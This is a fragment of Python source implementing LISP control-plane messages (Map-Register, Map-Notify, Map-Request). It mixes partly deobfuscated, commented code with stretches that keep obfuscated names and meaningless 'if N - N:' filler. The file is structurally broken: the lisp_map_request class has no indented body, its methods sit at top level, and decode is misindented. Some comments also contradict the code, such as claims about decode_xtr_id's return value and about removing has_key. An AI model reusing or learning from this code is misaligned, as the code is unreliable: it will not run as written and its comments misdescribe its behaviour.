        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
            auth_len = struct.calcsize("QQQQ")
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return (packet)

    def encode_auth(self, packet):
        """Splice self.auth_data into the auth field of an encoded packet."""
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        auth_data = self.auth_data
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return (packet)

    def decode(self, packet):
        """Decode a Map-Register from 'packet'.

        Returns [whole-packet-with-zeroed-auth, remaining-payload] on
        success, or [None, None] on any malformed input.
        """
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return ([None, None])

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return ([None, None])

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])

        self.auth_len = socket.ntohs(self.auth_len)
        self.proxy_reply_requested = True if (first_long & 0x08000000) else \
            False
        self.lisp_sec_present = True if (first_long & 0x04000000) else False
        self.xtr_id_present = True if (first_long & 0x02000000) else False
        self.use_ttl_for_timeout = True if (first_long & 0x800) else False
        self.map_register_refresh = True if (first_long & 0x1000) else False
        self.merge_register_requested = True if (first_long & 0x400) else \
            False
        self.mobile_node = True if (first_long & 0x200) else False
        self.map_notify_requested = True if (first_long & 0x100) else False
        self.record_count = first_long & 0xff

        # Encryption key-id rides in bits 14-16 when the E-bit is set.
        self.encrypt_bit = True if first_long & 0x2000 else False
        if (self.encrypt_bit):
            self.encryption_key_id = (first_long >> 14) & 0x7

        # The xTR-ID/site-ID trailer sits at the very end of the message.
        if (self.xtr_id_present):
            if (self.decode_xtr_id(orig_packet) == False):
                return ([None, None])

        packet = packet[format_size::]

        # Validate and extract authentication data, then zero it in the
        # original buffer so the hash can be recomputed by the caller.
        if (self.auth_len != 0):
            if (len(packet) < self.auth_len): return ([None, None])

            if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
                LISP_SHA_256_128_ALG_ID)):
                lprint("Invalid authentication alg-id: {}".format(
                    self.alg_id))
                return ([None, None])

            auth_len = self.auth_len
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                format_size = struct.calcsize("QQI")
                if (auth_len < format_size):
                    lprint("Invalid sha1-96 authentication length")
                    return ([None, None])
                auth1, auth2, auth3 = struct.unpack("QQI",
                    packet[:auth_len])
                auth4 = ""
            elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
                format_size = struct.calcsize("QQQQ")
                if (auth_len < format_size):
                    lprint("Invalid sha2-256 authentication length")
                    return ([None, None])
                auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                    packet[:auth_len])
            else:
                lprint("Unsupported authentication alg-id value {}".format(
                    self.alg_id))
                return ([None, None])

            self.auth_data = lisp_concat_auth_data(self.alg_id, auth1,
                auth2, auth3, auth4)
            orig_packet = self.zero_auth(orig_packet)
            packet = packet[self.auth_len::]

        return ([orig_packet, packet])

    def encode_xtr_id(self, packet):
        """Append the 128-bit xTR-ID and 64-bit site-ID trailer."""
        upper = self.xtr_id >> 64
        lower = self.xtr_id & 0xffffffffffffffff
        upper = byte_swap_64(upper)
        lower = byte_swap_64(lower)
        site_id = byte_swap_64(self.site_id)
        packet += struct.pack("QQQ", upper, lower, site_id)
        return (packet)

    def decode_xtr_id(self, packet):
        """Parse the xTR-ID/site-ID trailer from the end of 'packet'.

        Returns True on success, False when the packet is too short.
        """
        format_size = struct.calcsize("QQQ")
        # Bug fix: this used to return [None, None], which the caller's
        # "== False" test never matched, so truncated trailers slipped
        # through undetected.  Return False as the caller expects.
        if (len(packet) < format_size): return (False)
        packet = packet[len(packet) - format_size::]
        upper, lower, site_id = struct.unpack("QQQ", packet[:format_size])
        upper = byte_swap_64(upper)
        lower = byte_swap_64(lower)
        self.xtr_id = (upper << 64) | lower
        self.site_id = byte_swap_64(site_id)
        return (True)
# Removed: a run of "if N - N: ..." obfuscation filler statements.  Every
# condition was 0 (falsy), so none of the bodies ever executed; deleting
# them has no runtime effect.
class lisp_map_notify():
    """A LISP Map-Notify / Map-Notify-Ack message (RFC 6833).

    Carries EID-records back to a registering ETR, optionally
    authenticated with sha1-96 or sha2-256.  Packet buffers are plain
    byte strings (Python 2 str) built with struct.pack().
    """

    def __init__(self, lisp_sockets):
        # Destination ETR and retransmission state.
        self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.etr_port = 0
        self.retransmit_timer = None
        self.lisp_sockets = lisp_sockets
        self.retry_count = 0
        # Message fields.
        self.record_count = 0
        self.alg_id = LISP_NONE_ALG_ID
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = ""
        self.nonce = 0
        self.nonce_key = ""
        self.packet = None
        self.site = ""
        self.map_notify_ack = False
        self.eid_records = ""
        self.eid_list = []

    def print_notify(self):
        """Log a one-line human-readable summary via lprint()."""
        # Show hex auth-data only when its length matches the algorithm's
        # expected digest size; otherwise show the raw value.
        auth = binascii.hexlify(self.auth_data)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth) != 40):
            auth = self.auth_data
        elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth) != 64):
            auth = self.auth_data

        line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
            "{}{}{}, auth-len: {}, auth-data: {}")
        # NOTE(review): the "(sha1)/(sha2)" annotation tests self.key_id
        # against alg-id constants; likely meant self.alg_id.  Kept as-is
        # (log cosmetics only) -- confirm intent.
        lprint(line.format(bold("Map-Notify-Ack", False) if
            self.map_notify_ack else bold("Map-Notify", False),
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else
            ""), self.auth_len, auth))

    def zero_auth(self, packet):
        """Append a zeroed auth-data field sized for self.alg_id.

        Bug fix: an unsupported alg-id used to raise UnboundLocalError
        because the local buffer was only assigned inside the two known
        branches; now it defaults to the empty string (nothing appended).
        """
        if (self.alg_id == LISP_NONE_ALG_ID): return (packet)
        auth_data = ""
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
        packet += auth_data
        return (packet)

    def encode(self, eid_records, password):
        """Encode header + eid_records, authenticating with 'password'.

        Returns the finished packet (also cached in self.packet).
        """
        if (self.map_notify_ack):
            first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
        else:
            first_long = (LISP_MAP_NOTIFY << 28) | self.record_count

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        # No authentication: header + records is the whole message.
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.packet = packet + eid_records
            return (self.packet)

        # Hash over the message with a zeroed auth field, then splice the
        # digest into that field.
        packet = self.zero_auth(packet)
        packet += eid_records

        digest = lisp_hash_me(packet, self.alg_id, password, False)

        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        self.auth_data = digest
        packet = packet[0:offset] + digest + packet[offset + auth_len::]
        self.packet = packet
        return (packet)

    def decode(self, packet):
        """Decode a Map-Notify/Map-Notify-Ack.

        Returns the packet with a zeroed auth field (for hash
        verification), the raw EID-records when unauthenticated, or None
        on malformed input.
        """
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return (None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
        self.record_count = first_long & 0xff
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return (None)

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])

        self.nonce_key = lisp_hex_string(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        packet = packet[format_size::]
        self.eid_records = packet[self.auth_len::]

        if (self.auth_len == 0): return (self.eid_records)

        # Authentication present: pull out the digest words.
        if (len(packet) < self.auth_len): return (None)

        auth_len = self.auth_len
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
            auth4 = ""
        elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                packet[:auth_len])
        else:
            # Bug fix: an unknown alg-id used to fall through with the
            # auth words unbound and crash below; report and bail instead.
            lprint("Unsupported authentication alg-id value {}".format(
                self.alg_id))
            return (None)

        self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
            auth3, auth4)

        format_size = struct.calcsize("I") + struct.calcsize("QHH")
        packet = self.zero_auth(orig_packet[:format_size])
        format_size += auth_len
        packet += orig_packet[format_size::]
        return (packet)
# Removed: a run of "if N - N: ..." obfuscation filler statements.  Every
# condition was 0 (falsy), so no body ever ran; the block was a no-op.
class lisp_map_request ( ) :
def __init__(self):
    """Initialize an empty Map-Request with all flags clear."""
    # Header flag bits -- all start cleared.
    self.auth_bit = self.map_data_present = self.rloc_probe = False
    self.smr_bit = self.pitr_bit = self.smr_invoked_bit = False
    self.mobile_node = self.xtr_id_present = self.local_xtr = False
    self.dont_reply_bit = self.subscribe_bit = False

    # Counters and nonce.
    self.itr_rloc_count = 0
    self.record_count = 0
    self.nonce = 0

    # EIDs default to the unspecified AFI.
    self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
    self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
    self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
    self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    # RLOC list, crypto keys and signing state.
    self.itr_rlocs = []
    self.keys = None
    self.privkey_filename = None
    self.map_request_signature = None
    self.xtr_id = None
if 91 - 91: OoOoOO00 + o0oOOo0O0Ooo
if 23 - 23: i1IIi
def print_prefix(self):
    """Return the target EID (or (S,G) pair) as a green-colored string."""
    eid = self.target_eid
    if (self.target_group.is_null() == False):
        return (green(eid.print_sg(self.target_group), False))
    return (green(eid.print_prefix(), False))
if 18 - 18: Ii1I . OoOoOO00 + iII111i . I1IiiI + OoooooooOO . OoO0O00
if 31 - 31: I1Ii111 - I11i
def print_map_request ( self ) :
    # Log a one-line human-readable summary of this Map-Request via
    # lprint().  Flag letters are upper-case when the corresponding header
    # bit is set, lower-case when clear.
    oooOOOO0oOo = ""
    if ( self . xtr_id != None and self . subscribe_bit ) :
        # Subscription requests also carry the 128-bit xTR-ID.
        oooOOOO0oOo = "subscribe, xtr-id: 0x{}, " . format ( lisp_hex_string ( self . xtr_id ) )
    if 49 - 49: iIii1I11I1II1 - iIii1I11I1II1 - OoOoOO00 + IiII / OoOoOO00
    if 74 - 74: OoooooooOO + I1ii11iIi11i % O0
    if 32 - 32: I1ii11iIi11i + I1ii11iIi11i
    oOOo0ooO0 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
        "count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
        "afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:" )
    if 89 - 89: ooOoO0o + oO0o + Ii1I - OOooOOo
    # Positional arguments below must stay in exact format-string order.
    lprint ( oOOo0ooO0 . format ( bold ( "Map-Request" , False ) , "A" if self . auth_bit else "a" ,
        "D" if self . map_data_present else "d" ,
        "R" if self . rloc_probe else "r" ,
        "S" if self . smr_bit else "s" ,
        "P" if self . pitr_bit else "p" ,
        "I" if self . smr_invoked_bit else "i" ,
        "M" if self . mobile_node else "m" ,
        "X" if self . xtr_id_present else "x" ,
        "L" if self . local_xtr else "l" ,
        "D" if self . dont_reply_bit else "d" , self . itr_rloc_count ,
        self . record_count , lisp_hex_string ( self . nonce ) ,
        self . source_eid . afi , green ( self . source_eid . print_address ( ) , False ) ,
        " (with sig)" if self . map_request_signature != None else "" ,
        self . target_eid . afi , green ( self . print_prefix ( ) , False ) , oooOOOO0oOo ) )
    if 56 - 56: o0oOOo0O0Ooo - I1Ii111 / I11i
    # Print each ITR-RLOC; only the first one also shows the security
    # keys (oOoo0oO is reset to None after the first iteration).
    oOoo0oO = self . keys
    for III1iii1 in self . itr_rlocs :
        lprint ( " itr-rloc: afi {} {}{}" . format ( III1iii1 . afi ,
            red ( III1iii1 . print_address_no_iid ( ) , False ) ,
            "" if ( oOoo0oO == None ) else ", " + oOoo0oO [ 1 ] . print_keys ( ) ) )
        oOoo0oO = None
    if 78 - 78: I1Ii111 % OOooOOo
if 73 - 73: I1ii11iIi11i + iII111i * I1IiiI * I11i
if 35 - 35: I11i * O0 * OoO0O00 . I1ii11iIi11i
def sign_map_request(self, privkey):
    """Sign nonce+source-EID+target-EID with privkey.

    Stores the raw signature in self.map_request_signature and returns a
    JSON string carrying the EIDs and the base64-encoded signature.
    """
    sig_eid_str = self.signature_eid.print_address()
    src_str = self.source_eid.print_address()
    dst_str = self.target_eid.print_address()

    payload = lisp_hex_string(self.nonce) + src_str + dst_str
    self.map_request_signature = privkey.sign(payload)

    entry = {
        "source-eid": src_str,
        "signature-eid": sig_eid_str,
        "signature": binascii.b2a_base64(self.map_request_signature),
    }
    return (json.dumps(entry))
if 59 - 59: O0 % iII111i
if 32 - 32: Ii1I % I11i + OOooOOo % OoooooooOO
def verify_map_request_sig(self, pubkey):
    """Verify this Map-Request's signature against a base64 PEM pubkey.

    Logs the outcome and returns True when verification succeeds,
    False otherwise (including when pubkey is None or unparsable).
    """
    sig_eid_str = green(self.signature_eid.print_address(), False)
    if (pubkey == None):
        lprint("Public-key not found for signature-EID {}".format(
            sig_eid_str))
        return (False)

    # Rebuild the exact byte string that was signed.
    src_str = self.source_eid.print_address()
    dst_str = self.target_eid.print_address()
    payload = lisp_hex_string(self.nonce) + src_str + dst_str
    pubkey = binascii.a2b_base64(pubkey)

    verified = True
    try:
        verifier = ecdsa.VerifyingKey.from_pem(pubkey)
    except:
        lprint("Invalid public-key in mapping system for sig-eid {}".format(
            self.signature_eid.print_address_no_iid()))
        verified = False

    if (verified):
        try:
            verified = verifier.verify(self.map_request_signature, payload)
        except:
            verified = False

    status = bold("passed" if verified else "failed", False)
    lprint("Signature verification {} for EID {}".format(status,
        sig_eid_str))
    return (verified)
if 11 - 11: OoOoOO00 % I1ii11iIi11i - Ii1I - I1Ii111
if 58 - 58: OoOoOO00 . Ii1I / IiII * oO0o
def encode(self, probe_dest, probe_port):
    """Encode this Map-Request to its wire format.

    probe_dest/probe_port identify the RLOC being probed (RLOC-probe
    requests); used to look up per-RLOC encap crypto keys.  Returns the
    packet byte string, or None when a configured signing key cannot be
    parsed.
    """
    first_long = (LISP_MAP_REQUEST << 28) | self.record_count
    first_long = first_long | (self.itr_rloc_count << 8)
    if (self.auth_bit): first_long |= 0x08000000
    if (self.map_data_present): first_long |= 0x04000000
    if (self.rloc_probe): first_long |= 0x02000000
    if (self.smr_bit): first_long |= 0x01000000
    if (self.pitr_bit): first_long |= 0x00800000
    if (self.smr_invoked_bit): first_long |= 0x00400000
    if (self.mobile_node): first_long |= 0x00200000
    if (self.xtr_id_present): first_long |= 0x00100000
    if (self.local_xtr): first_long |= 0x00004000
    if (self.dont_reply_bit): first_long |= 0x00002000

    packet = struct.pack("I", socket.htonl(first_long))
    packet += struct.pack("Q", self.nonce)

    # Decide how the source-EID is encoded: as a JSON LCAF carrying a
    # signature, as an instance-id LCAF, or as a plain AFI address.
    json_encoded = False
    filename = self.privkey_filename
    if (filename is not None and os.path.exists(filename)):
        with open(filename, "r") as f:
            key_pem = f.read()
        try:
            signing_key = ecdsa.SigningKey.from_pem(key_pem)
        except:
            return (None)
        sig = self.sign_map_request(signing_key)
        json_encoded = True
    elif (self.map_request_signature is not None):
        # Reuse a previously computed signature.
        sig = binascii.b2a_base64(self.map_request_signature)
        sig = {"source-eid": self.source_eid.print_address(),
            "signature-eid": self.signature_eid.print_address(),
            "signature": sig}
        sig = json.dumps(sig)
        json_encoded = True

    if (json_encoded):
        lcaf_type = LISP_LCAF_JSON_TYPE
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_len = socket.htons(len(sig) + 2)
        json_len = socket.htons(len(sig))
        packet += struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
            lcaf_len, json_len)
        packet += sig
        packet += struct.pack("H", 0)
    else:
        if (self.source_eid.instance_id != 0):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.source_eid.lcaf_encode_iid()
        else:
            packet += struct.pack("H", socket.htons(self.source_eid.afi))
            packet += self.source_eid.pack_address()

    # RLOC-probe: pick up any negotiated encap keys for dest:port.
    if (probe_dest):
        if (probe_port == 0): probe_port = LISP_DATA_PORT
        addr_str = probe_dest.print_address_no_iid() + ":" + \
            str(probe_port)
        # Fix: dict.has_key() is Python-2-only; "in" works on 2 and 3.
        if (addr_str in lisp_crypto_keys_by_rloc_encap):
            self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]

    # Encode ITR-RLOCs.  With data-plane security, the first RLOC is
    # wrapped in a security LCAF carrying our key material.
    for itr in self.itr_rlocs:
        if (lisp_data_plane_security and self.itr_rlocs.index(itr) == 0):
            if (self.keys == None or self.keys[1] == None):
                keys = lisp_keys(1)
                self.keys = [None, keys, None, None]
            keys = self.keys[1]
            keys.add_key_by_nonce(self.nonce)
            packet += keys.encode_lcaf(itr)
        else:
            packet += struct.pack("H", socket.htons(itr.afi))
            packet += itr.pack_address()

    # Non-binary targets (e.g. distinguished names) carry mask-len 0.
    mask_len = 0 if self.target_eid.is_binary() == False else \
        self.target_eid.mask_len

    # Subscribe requests set the high bit of the reserved byte and must
    # carry an xTR-ID trailer.
    subscribe = 0
    if (self.subscribe_bit):
        subscribe = 0x80
        self.xtr_id_present = True
        if (self.xtr_id == None):
            self.xtr_id = random.randint(0, (2 ** 128) - 1)

    packet += struct.pack("BB", subscribe, mask_len)

    # Target EID: (S,G) LCAF, instance-id/geo LCAF, or plain AFI address.
    if (self.target_group.is_null() == False):
        packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
        packet += self.target_eid.lcaf_encode_sg(self.target_group)
    elif (self.target_eid.instance_id != 0 or
        self.target_eid.is_geo_prefix()):
        packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
        packet += self.target_eid.lcaf_encode_iid()
    else:
        packet += struct.pack("H", socket.htons(self.target_eid.afi))
        packet += self.target_eid.pack_address()

    if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
    return (packet)
if 19 - 19: i11iIiiIii * Oo0Ooo
if 33 - 33: i11iIiiIii + I1IiiI
def lcaf_decode_json(self, packet):
    """Decode a JSON LCAF carrying a signed Map-Request's source-EID.

    On success, stores source-EID, signature-EID and signature on self
    and returns the remaining packet bytes.  Returns the packet
    unmodified when it is not a JSON LCAF, and None on malformed input.

    Fix: dict.has_key() (Python-2-only, removed in Python 3) replaced
    with the "in" operator, which behaves identically on both.
    """
    packet_format = "BBBBHH"
    format_size = struct.calcsize(packet_format)
    if (len(packet) < format_size): return (None)

    rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = struct.unpack(
        packet_format, packet[:format_size])

    # Not a JSON LCAF -- hand the packet back untouched.
    if (lcaf_type != LISP_LCAF_JSON_TYPE): return (packet)

    # The LCAF length must cover the JSON string plus the trailing AFI.
    lcaf_len = socket.ntohs(lcaf_len)
    json_len = socket.ntohs(json_len)
    packet = packet[format_size::]
    if (len(packet) < lcaf_len): return (None)
    if (lcaf_len != json_len + 2): return (None)

    try:
        json_blob = json.loads(packet[0:json_len])
    except:
        return (None)

    packet = packet[json_len::]

    # A zero AFI terminates the LCAF; anything else is passed through.
    packet_format = "H"
    format_size = struct.calcsize(packet_format)
    afi = struct.unpack(packet_format, packet[:format_size])[0]
    packet = packet[format_size::]
    if (afi != 0): return (packet)

    # Source-EID: IPv4 (dotted-quad) or IPv6 (fully expanded) string.
    if ("source-eid" not in json_blob): return (packet)
    addr_str = json_blob["source-eid"]
    afi = LISP_AFI_IPV4 if addr_str.count(".") == 3 else \
        LISP_AFI_IPV6 if addr_str.count(":") == 7 else None
    if (afi == None):
        lprint("Bad JSON 'source-eid' value: {}".format(addr_str))
        return (None)

    self.source_eid.afi = afi
    self.source_eid.store_address(addr_str)

    # Signature-EID must be an IPv6-formatted crypto-EID.
    if ("signature-eid" not in json_blob): return (packet)
    addr_str = json_blob["signature-eid"]
    if (addr_str.count(":") != 7):
        lprint("Bad JSON 'signature-eid' value: {}".format(addr_str))
        return (None)

    self.signature_eid.afi = LISP_AFI_IPV6
    self.signature_eid.store_address(addr_str)

    if ("signature" not in json_blob): return (packet)
    self.map_request_signature = binascii.a2b_base64(
        json_blob["signature"])
    return (packet)
if 83 - 83: i11iIiiIii + iIii1I11I1II1
if 21 - 21: o0oOOo0O0Ooo / i11iIiiIii % I1Ii111
 def decode ( self , packet , source , port ) :
  """Parse a LISP Map-Request from the head of *packet*.

  Consumes, in order: the 32-bit flags word, the 64-bit nonce, the
  optional trailing xtr-id, the source-EID, each ITR-RLOC (plain
  AFI-encoded or LCAF security-key encoded, the latter driving the
  decap crypto-key state), and the target EID-record.  *source* is
  the outer source address (substituted for private ITR-RLOCs when
  lisp_nat_traversal is set) and *port* the outer UDP source port
  (part of the decap crypto lookup key).  Returns the remaining
  packet bytes, or None on any parse failure.
  """
  # First 32-bit word: type, flag bits, itr-rloc-count, record-count.
  O00oO00oOO00O = "I"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
  if 56 - 56: o0oOOo0O0Ooo * iIii1I11I1II1 . Ii1I + OoOoOO00 % I1Ii111
  ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
  ooo0OOoo = ooo0OOoo [ 0 ]
  packet = packet [ ooOoooOoo0oO : : ]
  if 11 - 11: OOooOOo
  # Next 64 bits: the Map-Request nonce.
  O00oO00oOO00O = "Q"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
  if 12 - 12: OoooooooOO * OOooOOo * I1ii11iIi11i * ooOoO0o
  oOO000 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
  packet = packet [ ooOoooOoo0oO : : ]
  if 26 - 26: OoooooooOO . i1IIi + OoO0O00
  # Crack the flags word (network byte order) into boolean fields.
  ooo0OOoo = socket . ntohl ( ooo0OOoo )
  self . auth_bit = True if ( ooo0OOoo & 0x08000000 ) else False
  self . map_data_present = True if ( ooo0OOoo & 0x04000000 ) else False
  self . rloc_probe = True if ( ooo0OOoo & 0x02000000 ) else False
  self . smr_bit = True if ( ooo0OOoo & 0x01000000 ) else False
  self . pitr_bit = True if ( ooo0OOoo & 0x00800000 ) else False
  self . smr_invoked_bit = True if ( ooo0OOoo & 0x00400000 ) else False
  self . mobile_node = True if ( ooo0OOoo & 0x00200000 ) else False
  self . xtr_id_present = True if ( ooo0OOoo & 0x00100000 ) else False
  self . local_xtr = True if ( ooo0OOoo & 0x00004000 ) else False
  self . dont_reply_bit = True if ( ooo0OOoo & 0x00002000 ) else False
  # Wire value is count-minus-one; store the actual count.
  self . itr_rloc_count = ( ( ooo0OOoo >> 8 ) & 0x1f ) + 1
  self . record_count = ooo0OOoo & 0xff
  self . nonce = oOO000 [ 0 ]
  if 42 - 42: i11iIiiIii * o0oOOo0O0Ooo % I11i % Oo0Ooo + o0oOOo0O0Ooo * i11iIiiIii
  if 66 - 66: Ii1I / IiII . OoooooooOO * Oo0Ooo % i11iIiiIii
  if 100 - 100: I1ii11iIi11i % II111iiii * i11iIiiIii - iII111i
  if 69 - 69: OOooOOo + iII111i / I1Ii111
  # The 128-bit xtr-id, when present, sits at the *end* of the packet.
  if ( self . xtr_id_present ) :
   # NOTE(review): decode_xtr_id() returns None (not False) on a short
   # packet, so this == False guard never fires -- confirm intent.
   if ( self . decode_xtr_id ( packet ) == False ) : return ( None )
  if 37 - 37: iIii1I11I1II1 * I11i / IiII * Oo0Ooo % i11iIiiIii
  if 93 - 93: ooOoO0o + ooOoO0o
  # Source-EID AFI (16 bits).
  ooOoooOoo0oO = struct . calcsize ( "H" )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
  if 65 - 65: OoooooooOO * I11i * oO0o % I1ii11iIi11i * II111iiii
  O000oOOoOOO = struct . unpack ( "H" , packet [ : ooOoooOoo0oO ] )
  self . source_eid . afi = socket . ntohs ( O000oOOoOOO [ 0 ] )
  packet = packet [ ooOoooOoo0oO : : ]
  if 86 - 86: i11iIiiIii / I11i * iII111i - iII111i
  if ( self . source_eid . afi == LISP_AFI_LCAF ) :
   # LCAF source-EID: try instance-id encoding first, then fall back
   # to a JSON-encoded EID.
   iIiiIIi1i111iI = packet
   packet = self . source_eid . lcaf_decode_iid ( packet )
   if ( packet == None ) :
    packet = self . lcaf_decode_json ( iIiiIIi1i111iI )
    if ( packet == None ) : return ( None )
   if 10 - 10: IiII % II111iiii
  elif ( self . source_eid . afi != LISP_AFI_NONE ) :
   packet = self . source_eid . unpack_address ( packet )
   if ( packet == None ) : return ( None )
  if 50 - 50: OoOoOO00 * iII111i
  self . source_eid . mask_len = self . source_eid . host_mask_len ( )
  if 59 - 59: I1IiiI * I1IiiI / I11i
  # LISP_NO_CRYPTO in the environment disables all key processing below.
  ooOO0oO0 = ( os . getenv ( "LISP_NO_CRYPTO" ) != None )
  self . itr_rlocs = [ ]
  # Consume each ITR-RLOC in turn.
  while ( self . itr_rloc_count != 0 ) :
   ooOoooOoo0oO = struct . calcsize ( "H" )
   if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
   if 50 - 50: Oo0Ooo
   O000oOOoOOO = struct . unpack ( "H" , packet [ : ooOoooOoo0oO ] ) [ 0 ]
   if 16 - 16: Ii1I - OoOoOO00 % Oo0Ooo / Ii1I . I11i + ooOoO0o
   III1iii1 = lisp_address ( LISP_AFI_NONE , "" , 32 , 0 )
   III1iii1 . afi = socket . ntohs ( O000oOOoOOO )
   if 78 - 78: iIii1I11I1II1 + OoO0O00 + i11iIiiIii
   if 21 - 21: Oo0Ooo + Ii1I % ooOoO0o + OoOoOO00 % I11i
   if 22 - 22: i1IIi / OoooooooOO . OoO0O00
   if 83 - 83: I1IiiI - OoooooooOO + I1ii11iIi11i . Ii1I / o0oOOo0O0Ooo + ooOoO0o
   if 90 - 90: I1IiiI - i11iIiiIii
   if ( III1iii1 . afi != LISP_AFI_LCAF ) :
    # Plain AFI-encoded ITR-RLOC address.
    if ( len ( packet ) < III1iii1 . addr_length ( ) ) : return ( None )
    packet = III1iii1 . unpack_address ( packet [ ooOoooOoo0oO : : ] )
    if ( packet == None ) : return ( None )
    if 42 - 42: OOooOOo . Oo0Ooo
    if ( ooOO0oO0 ) :
     # Crypto disabled: just record the RLOC and move on.
     self . itr_rlocs . append ( III1iii1 )
     self . itr_rloc_count -= 1
     continue
    if 21 - 21: iII111i . I1IiiI / I11i
    if 97 - 97: iIii1I11I1II1 + i1IIi - o0oOOo0O0Ooo
    oo0o00OO = lisp_build_crypto_decap_lookup_key ( III1iii1 , port )
    if 73 - 73: OoO0O00 - i11iIiiIii % I1Ii111 / Oo0Ooo - OoooooooOO % OOooOOo
    if 79 - 79: I1IiiI / o0oOOo0O0Ooo . Ii1I * I1ii11iIi11i + I11i
    if 96 - 96: OoO0O00 * II111iiii
    if 1 - 1: I1IiiI - OoOoOO00
    if 74 - 74: OoOoOO00 * II111iiii + O0 + I11i
    # Behind a NAT the RLOC is private; key state off the outer source.
    if ( lisp_nat_traversal and III1iii1 . is_private_address ( ) and source ) : III1iii1 = source
    if 3 - 3: iIii1I11I1II1 - i1IIi / iII111i + i1IIi + O0
    # No security-key LCAF present: drop any stale decap keys for
    # this RLOC and tell the data-plane via IPC.
    Ii1OOO0oo0o0 = lisp_crypto_keys_by_rloc_decap
    if ( Ii1OOO0oo0o0 . has_key ( oo0o00OO ) ) : Ii1OOO0oo0o0 . pop ( oo0o00OO )
    if 38 - 38: OoO0O00 * I1ii11iIi11i
    if 4 - 4: OoO0O00 . I1ii11iIi11i
    if 21 - 21: i11iIiiIii / OoO0O00 / I1ii11iIi11i * O0 - II111iiii * OOooOOo
    if 27 - 27: o0oOOo0O0Ooo . OoOoOO00 * Ii1I * iII111i * O0
    if 93 - 93: IiII % I1Ii111 % II111iiii
    if 20 - 20: OoooooooOO * I1Ii111
    lisp_write_ipc_decap_key ( oo0o00OO , None )
   else :
    # LCAF-encoded ITR-RLOC carrying the ITR's Diffie-Hellman
    # key material (lisp-crypto).
    OO0o0 = packet
    i1ii1iiI11ii1II1 = lisp_keys ( 1 )
    packet = i1ii1iiI11ii1II1 . decode_lcaf ( OO0o0 , 0 )
    if ( packet == None ) : return ( None )
    if 33 - 33: oO0o / I11i . OoOoOO00 * O0 - IiII
    if 12 - 12: i11iIiiIii + I1ii11iIi11i * OoO0O00
    if 13 - 13: Oo0Ooo + OoooooooOO / IiII
    if 56 - 56: I1ii11iIi11i * II111iiii
